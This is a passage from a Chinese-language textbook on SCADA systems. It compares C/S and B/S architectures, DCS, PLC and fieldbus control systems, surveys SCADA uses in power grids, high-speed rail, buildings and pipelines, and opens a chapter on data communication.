SCADA系统属于典型的分布式计算机应用系统,在这样的系统中,体系结构是软件系统中最本质的东西,良好的体系结构意味着普适、高效和稳定。由于体系结构是对复杂事务的一种抽象,良好的体系结构是普遍适用的,它可以高效地处理各种各样的个体需求。同时,体系结构在一定的时间内保持稳定。当需求发生变化时,程序员可以不用修改系统的体系结构。 1.3.1 客户机/服务器结构 C/S结构中客户机和服务器之间的通信以“请求-响应”的方式进行。客户机先向服务器发出请求,服务器再响应这个请求,如图1.5所示。 C/S结构最重要的特征是:它不是一个主从环境,而是一个平等的环境,即C/S系统中各计算机在不同的场合既可能是客户机,也可能是服务器。在C/S应用中,用户只关心完整地解决自己的应用问题,而不关心这些应用问题由系统中哪台或哪几台计算机来完成。能为应用提供服务的计算机,当其被请求服务时就成为服务器。一台计算机可能提供多种服务,一个服务也可能要由多台计算机组合完成。与服务器相对,提出服务请求的计算机在当时就是客户机。从客户应用角度看,这个应用的一部分工作在客户机上完成,其他部分的工作则在(一个或多个)服务器上完成。如在SCADA系统中,当SCADA服务器向PLC请求数据时,它是客户机,而当其他操作站向SCADA服务器请求服务时,它就是服务器。显然,这种结构可以充分利用两端硬件环境的优势,将任务合理分配到客户端和服务器端来实现,降低了系统的通信开销。 1.3.2 浏览器/服务器结构 随着Internet的普及和发展,以往的主机/终端和C/S结构都无法满足当前的全球网络开放、互连、信息随处可见和信息共享的新要求,于是就出现了B/S型结构,如图1.6所示。B/S结构最大特点是:用户可以通过浏览器去访问Internet上的文本、数据、图像、动画、视频点播和声音信息,这些信息都是由许许多多的Web服务器产生的,而每一个Web服务器又可以通过各种方式与数据库服务器连接,大量的数据实际存放在数据库服务器中。这种结构的最大优点是:客户机统一采用浏览器,这不仅让用户使用方便,而且使得客户端不存在维护的问题。当然,软件开发和维护的工作不是自动消失了,而是转移到了Web服务器端。可以采用基于Socket的ActiveX控件或Java Applet程序两种方式实现客户端与远程服务器之间的动态数据的交换。ActiveX控件和Java Applet都是驻留在Web服务器上,用户登录服务器后下载到客户机。Web服务器在响应客户程序过程中,若遇到与数据库有关的指令,则交给数据库服务器来解释执行,并返回给Web服务器,Web服务器再返回给浏览器。在这种结构中,将许许多多的网连接到一块,形成一个巨大的网,即全球网。而各个企业可以在此结构的基础上建立自己的Intranet。对于大型分布式SCADA系统而言,商的支持。 1.3.3 两种系统结构比较 1.B/S模式的优点和缺点 B/S结构的优点表现在: (1)具有分布性特点,可以随时随地进行查询、浏览等业务处理。 (2)业务扩展简单方便,通过增加网页即可增加服务器功能。 (3)维护简单方便,只需要改变网页,即可实现所有用户的同步更新。 (4)开发简单,共享性强。 B/S结构的缺点表现在: (1)个性化特点明显降低,无法实现具有个性化的功能要求。 (2)操作是以鼠标为最基本的操作方式,无法满足快速操作的要求。 (3)页面动态刷新、响应速度明显降低。 (4)功能弱化,难以实现传统模式下的特殊功能要求。 2.C/S模式的优点和缺点 C/S结构的优点表现在: (1)由于客户端实现与服务器的直接相连,没有中间环节,因此响应速度快。 (2)操作界面漂亮、形式多样,可以充分满足客户自身的个性化要求。 (3)C/S结构的管理信息系统具有较强的事务处理能力,能实现复杂的业务流程。 C/S模式的缺点表现在: (1)需要专门的客户端安装程序,分布功能弱,针对点多面广且不具备网络条件的用户群体,不能够实现快速部署安装和配置。 (2)兼容性差,对于不同的开发工具,具有较大的局限性。若采用不同工具,需要重新改写程序。 (3)开发成本较高,需要具有一定专业水准的技术人员才能完成。 一般而言,B/S和C/S两者结构上具有各自特点,都是流行的计算SCADA系统结构。在Internet应用、维护与升级等方面,B/S比C/S要强得多;但在运行速度、数据安全、人机交互等方面,B/S不如C/S。 1.4 典型工业控制系统及其比较 1.4.1 工业生产行业特性及其控制系统特点 由于不同行业都在使用自动化技术解决其生产过程自动化问题,而不同行业的生产有不同的特点,对控制设备的要求有所不同,进而产生了不同的工业控制系统结构及解决方案。以制造业为例,根据制造业生产加工的特点,主要可以分为离散制造业、流程工业,以及兼具连续与离散特点的间歇过程。 1.离散制造业 典型的离散制造业主要从事单件、小批量生产,适合于面向订单的生产组织方式。其主要特点是原料或产品是离散的,即以个、件、批、包、捆等作为单位,多以固态形式存在。代表行业是机械加工、电子元器件制造、汽车、服装、家电和电器、家具、烟草、五金、医疗设备、玩具、建材及物流等。 离散制造业的主要特点是: (1)离散制造企生产周期较长,产品结构复杂,工艺路线和设备配置非常灵活,临时插单现象多,零部件种类繁多。 (2)面向订单的离散制造业的生产设备布置不是按产品而通常是按照工艺进行布置的。 (3)所用的原材料和外购件具有确定的规格,产品结构可以用树的概念进行描述,最终产品是由固定个数的零件或部件组成,形成非常明确和固定的数量关系。 (4)通过加工或装配过程实现产品增值,整个过程不同阶段产生若干独立完整的部件、组件和产品。 (5)因产品的种类变化多,非标产品较多,要求设备和操作人员必须有足够灵活的适应能力。 (6)通常情况下,由于生产过程可分离,订单的响应周期较长,辅助时间较多。 (7)物料从一个工作地到另一个工作地的转移主要使用机器传动。 由于离散制造的上述生产特点,其控制系统也具有下述特点: (1)检测的参数多数是数字量,执行结构多是变频器及伺服机构等,控制过程多表现为逻辑与顺序控制。 (2)在单元级设备大量使用数控机床和以PLC为主要控制器的柔性制造系统等。 (3)生产多在室内进行,现场电磁、粉尘、振动等干扰多。 2.流程工业 流程工业主要表现为流水线的方式,其重要特点是物料在生产过程中多是连续流动的,常常通过管道进行各工序之间的传递,介质多为气体、液体或气液混合。流程工业典型行业有:石油、化工、钢铁企业炼钢过程、火力发电厂锅炉、食品、饮料等。 流程工业的主要特点是: (1)设备产能固定,计划的制订相对简单,常以日产量的方式下达,计划也相对稳定。 (2)对配方管理如安全性、保密性等的要求很高,但不像离散制造企业有准确的BOM。 (3)工艺固定,按工艺路线安排工作中心。工作中心是专门生产有限的相似的产品,工具和设备为专门的产品而设计,专业化特色较显著。 (4)生产过程中常常出现联产品、副产品、等级品。 (5)流程工业通常流程长、生产单元和生产关联度高。 (6)石油、化工等生产过程多具有高温、高压、易燃、易爆等特点。 由于流程工业的上述生产特点,其控制系统也具有下述特点: (1)检测的参数多为温度、压力、液位、流量及分析参数等模拟量,执行机构多是调节阀;控制过程主要是定值控制,以克服扰动作为主要目的。 (2)生产多在室外进行,对测控设备防水、防爆等级要求较高。 (3)生产过程的控制自动化程度较高,对于安全等级要求较高。该行业广泛使用集散控制系统和各类安全仪表系统。 1.4.2 几种典型工业控制系统 正如前文介绍,由于工业生产过程特点不同,其采用的控制系统也不同,对于综合自动化的管理与调度等功能要求也有所不同。总体而言,工业控制的发展遵循两条主线:一条就是工业控制理论的发展,即开发适用于各自行业的控制理论,解决生产控制中存在的根本性问题,最终提高产量、质量和效益。另外一条就是工业控制技术方面,主要是不断开发、升级现有的工业控制系统设备,从而不仅可以把工业控制理论落到实处,而且可以极大促进工业生产的自动化水平和管理水平。 根据目前国内外文献介绍,可以把工业计算机控制系统分为两大类,即SCADA系统和集散控制系统(DCS)。现场总线控制系统可以看作是DCS的进一步发展,而PLC则是制造业最主要的控制器设备。由于它们同属于计算机控制系统,因此,从本质上看,有许多共性的地方。下面作概述性的介绍和比较。 1. 集散控制系统 DCS系统,即集散控制系统,产生于20世纪70年代末。它适用于测控点数多而集中、测控精度高、测控速度快的工业生产过程(包括间歇生产过程)。DCS有其自身比较统一、独立的体系结构,具有分散控制和集中管理的功能。DCS的体系结构如图1.7所示。 DCS测控功能强、运行可靠、易于扩展、组态方便、操作维护简便,但系统的价格相对昂贵。DCS在石油化工、煤化工、电厂等大型企业中得到广泛应用。主要的DCS产品有Honeywell公司的 Experion PKS、Emerson过程管理公司的 PlantWeb、Foxboro公司的A2、横河公司的R3、ABB公司的 IndustrialIT和西门子公司的PCS7等。国产DCS厂家主要有北京和利时、浙大中控和上海新华控制等。 2. 可编程控制器 可编程控制器(PLC)是一类在制造业用量最大的控制设备,IEC对其定义如下:可编程控制器是一种专门为在工业环境下应用而设计的数字运算操作的电子装置。它采用一类可编程的存储器,用于存储其内部程序,执行逻辑运算、顺序运算、定时、计数与算术操作等面向用户的指令,并通过数字或模拟式的输入/输出控制各种类型的机械或生产过程。PLC及其有关外部设备都应该按易于与工业控制系统形成一个整体、易于扩展其功能的原则而设计。PLC组成原理框图如图1.8所示。PLC产生于制造业,具有逻辑控制功能强、性能稳定、可靠性高、技术成熟、使用广泛、价格合理等特点。与一般的计算机控制系统不同,PLC在程序运行上采取“扫描”方式工作,如图1.9所示。在系统程序监控下,PLC周而复始地按照固定顺序对系统内部的各种任务进行查询、判断和执行。这个过程实际上是一个不断循环的顺序扫描过程,一个顺序扫描过程称为一个扫描周期。为了增加对突发事件的响应,新一代的PLC还增加了中断响应,以提高实时性。 由于PLC控制点数可以从几点到几万点甚至更多,因此,PLC是用量最大的控制器。不过由于PLC本身不带有上位机界面,因此,PLC不是完整的工业控制系统,而只是一个现场控制器,不能把PLC与SCADA系统或DCS混淆。PLC可以用在SCADA系统,也可用在DCS中。 3. 现场总线控制系统 随着通信技术和数字技术的不断发展,逐步出现了以数字信号代替模拟信号的总线技术。1984年,现场总线的概念正式提出,IEC(International Electrotechnical Commission,国际电工委员会)对现场总线(Fieldbus)的定义为:现场总线是一种应用于生产现场,在现场设备之间、现场设备和控制装置之间实行双向、串形、多节点的数字通信技术。以现场总线为基础,产生了全数字的新型控制系统—现场总线控制系统(Fieldbus Control System,FCS)。现场总线控制系统一方面突破了DCS采用通信专用网络的局限,采用了基于公开化、标准化的解决方案,克服了封闭系统所造成的缺陷;另一方面把DCS的集中与分散相结合的集散系统结构,变成了新型全分布式结构,把控制功能彻底下放到现场。可以说,开放性、分散性与数字通信是现场总线系统最显著的特征。 现场总线控制系统具有如下显著特性。 1)互操作性与互用性 互操作性是指实现互连设备间、系统间的信息传送与沟通,可实行点对点、一点对多点的数字通信。而互用性则意味着不同生产厂家的性能类似的设备可进行互换,实现互用。 2)智能化与功能自治性 它将传感测量、补偿计算、工程量处理与控制等功能分散到现场设备中完成,仅靠现场设备即可完成自动控制的基本功能,并可随时诊断设备的运行状态。 3)系统结构的高度分散性 现场设备本身具有较高的智能特性,有些设备具有控制功能,因此可以使得控制功能彻底下放到现场,现场设备之间可以组成控制回路,从根本上改变了现有DCS控制功能仍然相对集中的问题,实现彻底的分散控制,简化了系统结构,提高了可靠性。 4)对现场环境的适应性 作为工厂网络底层的现场总线工作在现场设备前端,是专为在现场环境工作而设计的,它可支持双绞线、同轴电缆、光缆、射频、红外线、电力线等,具有较强的抗干扰能力,能采用两线制实现供电与通信,并可满足本质安全防爆要求等。 图1.10所示为Emerson DeltaV现场总线控制系统结构。现场总线控制系统可以包容多种类型的总线,因此,其支持的总线设备数量和种类很多。 1.4.3 DCS与SCADA系统比较 SCADA系统和集散控制系统(DCS)的共同点表现在: (1)两者具有相同的系统结构。从系统结构看,两者都属于分布式计算机测控系统,普通采用客户机/服务器模式,具有控制分散、管理集中的特点。承担现场测控的主要是现场控制站(或下位机),上位机侧重监控与管理。 (2)通信网络在两种类型的控制系统中都起重要的作用,且通常都具有至少两层网络结构。早期SCADA系统和DCS都采用专有协议,目前更多的是采用国际标准或事实的标准协议。 (3)下位机编程软件逐步采用符合IEC61131-3 标准的编程语言,编程方式的差异逐步缩小。 然而,SCADA系统与DCS也存在不同,主要表现在: (1)DCS是产品的名称,也代表某种技术,而SCADA更侧重功能和集成,在市场上找不到一种公认的SCADA产品(虽然很多厂家宣称自己有类似产品)。SCADA系统的构建更加强调集成,根据生产过程监控要求从市场上采购各种自动化产品而构造满足客户要求的系统。正因为如此,SCADA的构建十分灵活,可选择的产品和解决方案也很多。有时候也会把SCADA系统称为DCS,主要是这类系统也具有控制分散、管理集中的特点。但由于SCADA系统的软、硬件控制设备来自多个不同的厂家,而不像DCS那样,主体设备来自一家DCS制造商,因此,把SCADA系统称为DCS并不恰当。 (2)DCS具有更加成熟和完善的体系结构,系统的可靠性等性能更有保障,而SCADA系统是用户集成的,因此,其整体性能与用户的集成水平紧密相关,通常要低于DCS。也正因为DCS是专用系统,因此,DCS的开放性比SCADA系统差。 (3)应用程序开发有所不同,具体如下: ① DCS中变量不需要两次定义。由于DCS中上位机(服务器、操作员站等)、下位机(现场控制器)软件集成度高,特别是有统一的实时数据库,因此,变量只要定义一次,在控制器回路组态中可用,在上位机人机界面等其他地方也可以用。而SCADA系统中同样一个I/O点,比如现场的一个电机设备故障信号,在控制器中要定义一次,在组态软件中还要定义一次,同时还要要求两者之间做映射(即上位机中定义的地址要与控制器中存储器地址一致),否则,上位机中的参数状态与控制器及现场不一致。 ② DCS具有更多的面向模拟量控制的功能块。由于DCS主要面向模拟量较多的应用场合,各种类型的模拟量控制较多。为了便于组态,DCS开发环境中具有更多的面向过程控制的功能块。而不同的SCADA系统其I/O变量类型分布不一致,通常情况下,数字量点数会更多一些。 ③ 组态编程语言有所不同。DCS编程主要是图形化的编程方式,如西门子PCS7用CFC、罗克韦尔的功能块图等。当然,编写顺控程序时,DCS中也用SFC编程语言,这点与SCADA系统中下位机编程是一样的。 ④ DCS控制器中的功能块与人机界面的面板(Faceplate)通常成对。例如,在控制器中组态一个PID回路后,在人机界面组态时可以直接根据该回路名称调用一个具有完整PID功能的人机界面面板,面板中的参数自动与控制回路中的一一对应,如图1.11所示。而SCADA系统中用户必须在人机界面组态软件中自行设计这样的面板,同时把面板中的数据与控制器中功能块数据进行关联,整个设计过程较为烦琐和费时。 ⑤ DCS应用软件组态和调试时有一个相对统一的环境,在该环境中,可以方便地进行硬件组态、网络组态、控制器应用软件组态和人机界面组态,以及进行相关的调试。而SCADA系统整个功能的实现相对分散。 (4)应用场合不同。DCS主要用于控制精度要求高、测控点集中的流程工业,如石油、化工、冶金、电站等工业过程。而SCADA系统特指远程分布式计算机测控系统,主要用于测控点十分分散、分布范围广泛的生产过程或设备的监控,通常情况下,测控现场是无人或少人值守,如移动通信基站、长距离石油输送管道的远程监控、流域水文/水情的监控、城市煤气管线的监控等。通常每个站点I/O点数不太多。一般来说,SCADA系统中对现场设备的控制要求低于DCS中被控对象要求。有些SCADA应用中,只要求进行远程的数据采集而没有现场控制要求。总的来说,由于历史的原因,造成了不同的控制设备各自称霸一个行业市场。 (5)市场规模不同。由于DCS是成套系统,设备及软件授权等费用高,如果I/O点数少于百点,则DCS的单点成本会较高。而SCADA系统中采用的控制器,其控制点数配置更加灵活,可以根据I/O点数选择相应的控制器,因此,对于小点数的系统来说,SCADA系统的相对成本要低,更容易被用户选用。由于SCADA系统控制器配置灵活,同时远程监控的需求也更多,因此,从市场规模看,SCADA系统要超过DCS。 SCADA系统、DCS与PLC的不同主要表现在: (1)DCS具有工程师站、操作员站和现场控制站;SCADA系统具有上位机(包括SCADA服务器和客户机);而PLC组成的系统是没有上位机的,其主要功能就是现场控制,常选用PLC作为SCADA系统的下位机设备,因此,可以把PLC看作SCADA系统的一部分。PLC也可以集成到DCS中,成为DCS的一部分。从这个角度来说,PLC与DCS 和SCADA系统是不具有可比性的。 (2)系统规模不同。PLC可以用在控制点数从几个到上万个点领域,因此,其应用范围极其广泛。而DCS或SCADA系统主要用于规模较大的过程,否则其性价比就较差。此外,在顺序控制、逻辑控制与运动控制领域,PLC广泛使用。然而,随着技术的不断发展,各种类型的控制系统相互吸收融合其他系统的特长,DCS与PLC在功能上不断增强,具体地说,DCS的逻辑控制功能在不断增强,而PLC连续控制的功能在不断增强,两者都广泛吸收了现场总线技术,因此它们的界限也在不断地模糊。 随着技术的不断进步,各种控制方案层出不穷,一个具体的工业控制问题可以有不同的解决方案。但总体上来说,还是遵循传统的思路,即在制造业的控制中,还是首选PLC 或SCADA解决方案,而过程控制系统首选DCS。对于监控点十分分散的控制过程,多数还是会选SCADA系统,只是随着应用的不同,下位机的选择会有不同。当然,由于控制技术的不断融合,在实际应用中,有些控制系统的选型还是具有一定的灵活性。以大型的污水处理工程为例,由于它通常包括污水管网、泵站、污水处理厂等,在地域上较为分散,检测与控制点绝大多数为数字量I/O,模拟量I/O数量远少于数字量I/O,控制要求也没有化工生产过程那么严格,因此,多数情况下还是选用SCADA系统,而下位机多采用PLC,通信系统采用有线与无线相结合的解决方案。当然,在国内,采用DCS作为污水处理厂计算机控制系统主控设备也是有的。但是,远程泵站与污水处理厂之间的距离通常会比较远,且比较分散,还是会选用PLC做现场控制,泵站PLC与厂区DCS之间采用有线或无线通信,而这种通信方式主要用在SCADA系统,在DCS中是比较少的。因此,污水处理过程控制具有更多SCADA系统的特性,这也是国内外污水处理厂的控制普通采用SCADA系统而较少采用DCS的原因之一。以图1.1所示的大型油田自动化系统来说,通常同时采用SCADA系统和DCS。因为油井侧使用SCADA系统是最为经济的方案,而联合站由于测控点多且较为密集,采用DCS是最合适的选择。但如果从整个油田工控系统看,控制系统总体的结构还是属于SCADA系统。 1.5 SCADA系统的应用 1.5.1 SCADA系统应用效果 采用SCAD系统可以带来一系列的经济和社会效益,包括: · 极大地提高了生产和运行管理的安全性能和可靠程度。 · 生产配方管理的自动化可大大提高产品的质量和生产的效率。 · 极大地减少了生产人员面临恶劣工作环境的可能性,保证了工作过程中第一位的人员的安全性。 · 可大大地减少不必要的人工浪费。 · 通过生产过程的集中控制和管理,极大地提高企业作为一个整体效率的竞争能力。 · 系统通过对设备生产趋势的保留和处理,可提高预测突发事件的能力,在紧急情况下的快速反应和处理能力,可极大地减少生命和财产的损失,从而带来潜在的社会和经济效益。 正因为如此,SCADA系统获得了大量的应用。 1.5.2 SCADA系统在电力系统中的应用 在电力系统中,SCADA系统应用最为广泛,技术发展也最为成熟。它作为能量管理系统(EMS系统)的一个最主要的子系统,有着信息完整、效率高、能正确掌握系统运行状态、可加快决策、能帮助快速诊断出系统故障状态等优势,现已经成为电力调度不可缺少的工具。它对提高电网运行的可靠性、安全性与经济效益,减轻调度员的负担,实现电力调度自动化与现代化,提高调度的效率和水平发挥着不可替代的作用。目前我国骨干输变电线路上的超高压变电站(500KV、220KV及绝大部分110KV变电站)大多已经建立起光纤传输连接,并在生产管理上建立了SCADA系统,可以进行中心调度、地区调度的多级监控、调度管理。 图1.12所示为典型的电力SCADA系统结构图。该系统采用集中管理、分散布置的模式,分层、分布式的系统结构。系统由站内管理层、数据通信层、基础设备层组成,其中: (1)站内管理层实现变电所控制室对本变电所设备的监视、报警功能,并负责变电所综合自动化系统与综合监控系统之间的数据交换。包括双冗余通信控制器、双冗余以太网交换机、工作站、自动化屏、智能测控单元(含DI/DO/AI模块)等设备。 (2)数据通信层实现变电所内管理层与基础设备层之间的通信。包括光电转换装置、光缆、通信电缆等设备。 (3)基础设备层实现对基础设备数据的采集、测量等功能。包括220kV等不同电压等级交流保护测控单元、直流保护测控单元、交直流电源屏系统监控单元、变压器与整流器监控单元、钢轨电位限制装置、排流柜测控装置、电度表等设备。 系统还配置有GPS精密对时设备,这是电力SCADA系统与一般行业SCADA系统的一个重要不同之处。 1.5.3 SCADA系统在高铁防灾系统中的应用 在武广高铁上采用SCADA技术建立了铁路防灾系统。武广高铁全长995公里,有10个车站,3个数据调度中心,分别位于武昌新火车站、长沙火车站和广州南站内。全线共设置155个防灾监控单元,包括2处监控数据处理设备、2处调度所监控设备。整个防灾监控系统采用贝加莱公司的SCADA产品。该系统实现了对远程无人值守站点、环境恶劣站点的监控。系统设有风速监测站点109个、雨量监测站点51个、异物监测站点125个,可以将暴风在机车运行时产生的影响,暴雨造成的潜在泥石流、路基受陷等潜在的因素,以及在桥梁、隧道、山体等区段出现异物进入轨道与运行区域时,及时进行数据采集,并将上述数据上传给调度中心,以便能够及时给出调整。由于该SCADA系统的可靠运行对于保障列车的运行安全和乘客的生命安全具有非常重要的作用,因此,在进行SCADA系统配置时,采用了冗余设计,包括电源、机架、CPU、I/O和通信等。 1.5.4 SCADA系统在楼宇自动化中的应用 楼宇自动化系统的上位机通常采用组态软件开发,下位机主要是各种DDC控制器。上位机通过楼宇自动化常用的总线及其他通信协议与下位机通信,完成数据采集与集中监控功能。通常楼宇SCADA系统包括多个子系统,它们分别是高压配电监控系统、低压配电监控系统、供水监控系统、排污监控系统、中央空调系统、照明监控系统、电梯集群管理系统、停车场监控系统。 1.高压配电监控系统 高压配电监控主要实现对市电进线和高压出线的电压、电流、不平衡电流、有功功率、无功功率、功率因数、相角等参数的采集显示,包括对变压器各参数的采集显示。 2.低压配电监控系统 低压配电监控主要是对各控制柜(包括:市电进线柜、市发电转换柜、低压联络柜、空调动力开关柜、供水动力开关柜、排污动力开关柜、自设备间动力柜、电梯动力开关柜、路灯照明开关柜、安防动力开关柜、楼层动力开关柜、停车场动力开关柜、地下层动力开关柜)电参数的采集显示。 3.供水监控系统 供水监控系统主要是对供水加压泵(包括补压泵)的状态监控,地下水池的水位检测(溢出水位、生活水位、消防水位),变频器及进水蝶阀状态的监控。加压泵组变频调速采用一台变频器带多台泵方式,压力过大时,依次变频调速到停止各加压泵,当用水量较小时用补压小泵供压,从而达到节能的目的。为均衡各个加压泵的运行时间,延长加压泵组的使用寿命,每次启动的第一台加压泵是累计工作时间最少的加压泵。 4.排污监控系统 排污监控系统主要对各个排污泵运行状态的监控及污水池污水液位的监测。控制排污泵定时启动排污,污水池污水液位过低时连锁关闭排污泵,污水液位过高时自动启动排污泵并报警。 5.中央空调系统 中央空调系统参考供水温度、回水温度及其温差,通过DDC控制器对制冷机组进行状态控制。参考供回水压差控制冷水机组/冷却机组的运行状态。按顺序启动和停止冷冻系统,以保证系统正常运转。 在新风机组及风机盘管的控制中按时间程序和最佳启停控制送风机运行,起动次数、运行时间累计。根据新风温度和房间温度设定值,通过最佳启停控制器,计算出空调机开/关的最佳时间,以达到节省能源的目的。 DDC按温度传感器提供的送风温度与其设定值的偏差作PID计算,调节冷冻水阀的开度,以保持送风温度。可以根据现场的具体情况和用户的要求,对这些程序中的参数及连锁点进行修改和设定。 6.照明监控系统 照明监控系统主要包括各个楼层的照明监控、地下室照明监控、楼顶照明灯监控、航空指示灯的监控、路灯监控等。该系统采集、控制点多,数据量大,是ControX强大的数据处理能力的完美体现。 7.电梯集群管理系统 电梯集群管理系统是由上位机完成对电梯运行情况的管理、监测和启动、停止及定时维护等控制工作,由下位机PLC完成电梯运行过程中的逻辑控制功能。上位机可实现的功能包括电梯到层数、电梯运行状况,以及电梯维护、运行、停止状态等。 8.停车场监控系统 停车场监控系统是对出入车辆的管理系统。车辆的出入及收费采用IC卡管理系统,对长期用户可用月卡,对来访车辆可用临时IC卡,所有IC卡均经读卡机自动收费。此外,还可在小区出入口设置摄像机对来往车辆进行自动监控,把车辆的资料(车牌号码、颜色等)传输到上位机监控系统中。当有车辆离开时,司机所持的IC卡必须和电脑资料一致时才能升杆放行。 1.5.5 SCADA系统在油气长距离输送中的应用 SCADA系统在油气长距离输送中占有重要的地位,它对油气输送有关的首站、门站、分输站、压气站、阀室、末站等场站设备进行监控。SCADA系统由调度中心、场站常规控制系统、安全仪表系统,以及连接调度中心和场站控制系统的通信网络组成。在控制层级上,具有控制中心级、站控、现场设备级和手动4级结构,可以选择一种模式进行操作。在正常情况下管道沿线各站无须人工干预,各站在调度控制中心的统一指挥下完成各自的工作。经调度控制中心授权后,可将控制权切换到站控级。当数据通信系统发生故障时,由站控级自动接管控制权,完成对本站的监视控制。当进行设备、通信系统检修或紧急停车时,可采用就地控制。 1. 调度/监控中心的作用 (1)监视各站的工作状态及设备运行情况,采集与存储场站主要运行数据和状态信息,它们包括如下。 ① 参数检测:进出站油温、油压;首站、清管站、末站和分输站流量;输油泵机组(包括原动机及辅机)的有关数据;油灌液位、油温及储油量,泵机组进出口油温、油压及流量,燃料油压力及流量;泵站出站压力调节间的开度及阀前、后压差;站母线电压、输油泵电机电流等。此外,在场站还采用在线气相色谱分析仪,实时监测天然气的组份,保证计量的准确度。 ② 报警信号:油品进站压力过低,出站压力过高;油灌液位(高、低)超限;停电。输油泵机组故障停运;出站调节间故障;输油泵机组轴承温度过高,振动量过大;安全阀、泄压阀动作等。 ③ 状态量检测:输油泵机组、出站调节阀和主要阀门的运行状态。 (2)远程监控功能,主要有: ① 从远方各输油站PLC采集数据,监视各输油站工作状态及设备运行情况。记录重要事件的发生,工艺参数及设备运行状态参数超限报警,显示、打印报警报告。 ② 给远方各输油站的PLC发送指令(同时进行指令记录),程序自动启停机组、开关阀门及自动切换工艺流程。 ③ 对需要调节的主要参数如压力、油温、流量进行远方给定和自动调节,对各输油站的工艺参数及设备运行状态参数的报警值及停机(跳闸)设定值可进行远方修改。 ④ 显示管道全线的工作状态,打印管道全线运行报告。 ⑤ 对管道全线密闭输送进行水击超前保护控制。 ⑥ 对管道全线进行实时工艺计算和优化运行控制。 ⑦ 对管道全线进行清管控制。 ⑧ 对管道全线及各站运行的设备状态及工艺参数进行现场趋势显示和历史趋势显示。 ⑨ 对系统设备的故障与事件等具有自检功能。 (3)安全与管理等功能,主要有: ① 发布ESD(紧急停车)指令。 ② 系统时钟同步。 ③ 数据通信信道故障时主备信道间的切换。 ④ 向管道沿线各站下达压力和流量设定值。 2. 场站常规控制系统的主要功能 (1)过程变量巡回检测和数据处理。 (2)向控制中心报告经选择的数据和报警。 (3)提供画面、图像显示。 (4)除执行控制中心的控制命令外,还可独立进行工作,实现PID及其他控制。 (5)实现流程切换。 (6)联锁保护功能。 (7)进行自诊断程序,并把结果报告给控制中心。 (8)提供给操作人员操作记录和运行报告。 3. 场站安全仪表系统的功能 安全仪表系统主要对大型空压机、危险气体泄漏等实施紧急停车,确保设备、人员和生产安全。 4. 数据通信系统 SCADA系统的数据传输系统是一个重要的环节,它利用各种通信线路,把主计算机与分散在远处的RTU有机地连接起来,实时进行数据信息的交换和处理。通常通信媒介有电话线、微波线路、光纤或卫星线路等。为了确保数据可靠传输,通常采用冗余的通信方式,有线与无线通信互备。 1.5.6 SCADA系统在其他领域的应用 正是由于SCADA系统能产生巨大的经济和社会效益,因此除了上述领域,SCADA系统在以下领域也得到广泛使用。 1)无人工作站系统 用于集中监控无人看守系统的正常运行,这种无人值班系统广泛分布在以下行业: · 无线通信基站网。 · 邮电通信机房空调网。 · 电力系统配电网。 · 铁路系统道口,信号管理系统。 · 坝体、隧道、桥梁、机场和码头等安全监控网。 · 地铁、铁路自动计费系统。 · 高速公路、城市道路交通监控。 · 城市供热、供水、雨水泵站、污水泵站等公用设施的监控和调度。 · 环境、天文和气象参数的监测和管理。 · 风力发电厂、太阳能电厂的远程监控。 · 发电厂、污水厂、垃圾发电厂等污染源在线监控。 2)生产线管理 用于监控和协调生产线上各种设备正常有序的运营和产品数据的配方管理。这些生产线包括家电、家具、汽车、卷烟、纺织品生产线等。 3)大型设备远程监控 如大型港口机械的远程监控、大型中央空调的远程监控、远洋轮船的远程监控等。 4)重要危险源的远程监控 如化工危险品运输车的实时监控等。 5)其他生产和生活相关行业 如粮库质量和安全监测、油库安全、化工仓储设施的安全监控、物流配送的监控等。 第2章 数据通信与网络技术 2.1 SCADA系统中的数据通信 数据通信是完成数据编码、传输、转换、存储、处理的过程,是计算机技术与通信技术相结合的产物。测控现场的仪表、控制装置与上、下位机的数据通信是确保系统安全运行的重要保证和先决条件。与一般的控制系统相比,SCADA固有的测控点分散、测控范围广的特点决定了整个通信子系统在SCADA系统的运行过程中起到了更加重要的作用。 在SCADA系统中,通常包含以下几种数据通信过程。 1.现场测控站点仪表、执行机构与下位机的通信 传统上,现场仪表及各种其他类型的测控设备与下位机的通信多数是采用平行接线,即采用硬接线方式把每个测控点连接到控制系统的I/O设备上。这种点对点的布线方式,在现场总线技术出现后显得落后,特别是当测控点十分分散时。目前,多数SCADA系统的现场测控站多采用现场总线与平行接线混合的方式。下位机系统配置现场总线接口,在测控点相对集中的设备附近设置现场I/O站,现场I/O站与下位机系统采用现场总线通信。在一些布线不方便的地方,也会采用短程无线通信技术。 2.下位机系统与SCADA服务器(上位机)的远程通信 SCADA系统的通信子系统中,上、下位机之间的通信最复杂。这主要是因为下位机数量较多,下位机系统结构与型号等呈现多样化;此外,上、下位机物理距离通常较大,从几百米、几千米到上百千米甚至更远。通常在一个大型的SCADA系统,上、下位机的通信形式十分多样,从通信介质看,既有有线通信,也有无线通信,其中以无线通信为主,有线通信为辅。无线通信中,包括数传电台、微波、GPRS和卫星等。 3.监控中心不同功能计算机之间的通信 在SCADA系统监控中心配置各种功能的计算和服务器,它们各自承担一定的作用,同时又要进行快速数据交换和信息共享。为了实现这个目的,监控中心的计算机普遍采用以太网连接,采用高速交换机以及带宽可高达100M甚至更高的传输介质。在过去,以太网的主要缺点是其采用的CSMA/CD规范并不能保证严格的时间确定性需求,近年来开发的一些新技术已经较好地解决了将以太网应用于工业通信所存在的问题,工业以太网在工业现场级的应用得到很大发展。 4.监控中心Web服务器与远程客户端的通信 由于Internent的普及和发展及B/S结构在远程服务方面的优势,基于Internent的远程监控应用也越来越多。因此,在上位机监控中心要配置Web服务器,以响应远程客户端的用户访问。 本章主要包括数据通信的基础知识以及SCADA系统中常用的各种通信技术,既有传统的串行通信,包括适应串口设备联网的串口服务器,也包括各种网络通信技术,特别是现场总线技术与以太网技术及它们在SCADA中的应用。此外,对SCADA系统中的各种无线通信技术也做了较详细介绍。 2.2 数据通信概述 2.2.1 数据通信系统组成 数据是指对数字、字母以及组合意义的一种表达。在SCADA系统中,通信数据与监控系统的各种信息紧密相关,如用数字1表示电机处于工作状态,用数字0表示电机处于停止状态;而对于温度、压力、物位、流量、电流、电压等变量可以用一定数值范围的数字来描述。 数据通信系统是指以计算机为中心,通过数据传输信道将分布在各处的数据终端设备连接起来,以实现数据通信为目的的系统。实际的数据通信系统是千差万别的。例如,可以是两台计算机点对点近距离数据传输,可以是工业现场智能设备与控制器之间的数据通信,也可以是分布在各地的数百台甚至更多的计算机互相传送数据。 